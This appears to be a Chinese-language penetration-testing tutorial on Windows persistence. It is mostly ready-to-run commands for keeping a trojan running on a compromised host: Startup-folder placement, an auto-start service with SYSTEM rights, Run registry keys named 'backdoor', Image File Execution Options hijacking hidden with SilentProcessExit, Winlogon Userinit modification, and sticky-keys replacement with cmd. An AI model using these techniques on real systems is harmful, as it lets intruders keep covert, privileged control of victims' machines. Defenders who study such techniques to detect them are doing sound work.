案例一: 权限维持-域环境&单机版-自启动
自启动路径加载
路径地址
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\
##英文
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\开始菜单\程序\启动\
##中文
把木马程序上传到目标文件夹
重启服务器
自启动服务加载
命令 创建自动启动的服务
sc create ServiceTest binPath= C:\1.exe start= auto ##创建服务
sc delete ServiceTest ##删除服务
木马就设置在c:/1.exe
重启主机 ,查看服务
成功上线,并且一定是system权限
自启动注册表加载
自启动注册表用户以及系统目录
- 当前用户键值
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run- 服务器键值(需要管理员权限)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
添加,需要管理员权限运行
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "backdoor" /t REG_SZ /F /D "C:\1.exe"
成功上线
查看注册表信息
计时任务
不过多介绍,不会看这篇文章
第128天:内网安全-横向移动&IPC&AT&SC 命令&Impacket 套件&CS 插件&全自动_横向移动之ipc配合任务计划-CSDN博客
案例二:权限维持-域环境&单机版-映像劫持
注册表的位置
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
注册表里面有很多可执行程序
把notepad命令替换成为exe命令,管理员权限运行
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v debugger /t REG_SZ /d "cmd.exe"
#添加
REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v debugger /f
#删除
打开文本文档,直接会弹出exe,但是这样会比较可疑
正常你运行记事本后弹出这个窗口
配合GlobalFlag隐藏:执行记事本正常关闭,后触发别的程序,把后面的修改为自己想执行的程序即可
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\1.exe"
执行文件关闭后
成功上线
案例三:权限维持-域环境&单机版-屏保&登录
利用的是登陆的时候的运行的程序,在程序后面加上程序,就可以
注册表的位置
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
打开后可以看到后面默认有一个逗号,可以添加程序
修改注册表,把木马程序加进去,管理员权限运行
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "Userinit" /t REG_SZ /F /D "C:\Windows\System32\userinit.exe,C:\1.exe"
这个时候注销或者是等屏幕自动息屏登录的时候,会触发这个程序
登录成功以后会上线
案例四:权限维持-域环境&单机版-粘滞键
了解即可,目前新版本系统已经用不了了。
修改的命令
move sethc.exe sethc1.exe
copy cmd.exe sethc.exe
并且修改需要很高的权限,system权限在cs中也无法运行
就是在远程连接的时候,按五次shift,会触发粘滞键位,把这个修改为cmd就可以运行对面的cmd命令,也可以修改为木马直接执行。